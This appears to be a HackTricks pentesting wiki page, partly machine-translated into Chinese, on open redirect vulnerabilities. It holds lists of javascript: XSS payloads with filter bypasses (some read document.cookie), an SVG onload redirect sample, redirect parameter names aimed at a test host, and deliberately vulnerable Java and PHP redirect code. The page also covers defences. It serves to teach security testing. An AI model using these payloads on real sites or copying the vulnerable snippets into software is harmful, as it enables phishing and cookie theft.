hacktricks/pentesting-web/open-redirect.md

10 KiB
Raw Blame History

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

其他支持HackTricks的方式

开放重定向

重定向到本地主机或任意域

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

开放重定向到XSS

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

Open Redirect 上传 svg 文件


攻击场景

攻击者可以利用应用程序中的开放重定向漏洞,诱使用户上传恶意 SVG 文件,并在用户访问包含恶意 SVG 文件的 URL 时执行恶意操作。

攻击描述

攻击者上传恶意 SVG 文件到应用程序,并利用开放重定向漏洞构造恶意 URL将用户重定向到包含恶意 SVG 文件的 URL。当用户访问该 URL 时,浏览器会解析 SVG 文件并执行其中的恶意代码,从而导致攻击成功。

攻击步骤

  1. 攻击者上传恶意 SVG 文件到应用程序。
  2. 攻击者构造包含恶意 SVG 文件的 URL并利用开放重定向漏洞。
  3. 用户访问恶意 URL浏览器解析 SVG 文件并执行其中的恶意代码。

防御建议

  • 应用程序上传功能应该对上传的文件类型进行严格限制,避免上传 SVG 文件。
  • 验证重定向 URL 是否在应用程序的控制范围内,避免开放重定向漏洞的利用。
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

常见的注入参数

An open redirect vulnerability exists when a web application allows a user to redirect to an external site by manipulating the URL. This can be exploited by an attacker to redirect users to malicious websites to perform phishing attacks or distribute malware. To identify open redirect vulnerabilities, testers can manipulate parameters commonly used for redirection, such as:

  • url
  • link
  • next
  • target

By injecting malicious URLs into these parameters, testers can determine if the application is vulnerable to open redirects.

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

代码示例

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

Open Redirect

An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this vulnerability to redirect users to malicious websites, phishing pages, or other harmful content.

Example

Consider the following vulnerable Java code snippet:

String redirectUrl = request.getParameter("redirect");
response.sendRedirect(redirectUrl);

In this example, the web application blindly redirects users to the URL specified in the redirect parameter without any validation. An attacker can craft a malicious link like http://vulnerable-website.com/?redirect=http://malicious-website.com to redirect users to a harmful website.

Prevention

To prevent open redirect vulnerabilities in Java web applications, always validate and sanitize user-supplied input before using it to redirect users. Whitelist allowed URLs or domains and ensure that the redirect URL belongs to the expected domain.

response.redirect("http://mysafedomain.com");

PHP

Open Redirect

An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. This can be abused by an attacker to craft a malicious link that redirects users to a phishing page or a malware download.

Example

Consider the following PHP code snippet:

<?php
$redirect_url = $_GET['url'];
header('Location: ' . $redirect_url);
?>

In this code, the script takes a URL from the url parameter in the query string and redirects the user to that URL using the header() function. An attacker can exploit this by crafting a link like http://example.com/redirect.php?url=http://malicious-site.com.

Impact

The impact of an open redirect vulnerability includes phishing attacks, malware distribution, and social engineering attacks. It can be used in combination with other vulnerabilities to further compromise the security of a web application.

Remediation

To prevent open redirect vulnerabilities, always validate and sanitize user input before using it in a redirect. Whitelist allowed domains or use a safe redirect method that does not rely on user-controlled input.

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>

工具

资源

从零开始学习AWS黑客技术 htARTE (HackTricks AWS Red Team Expert)!

支持HackTricks的其他方式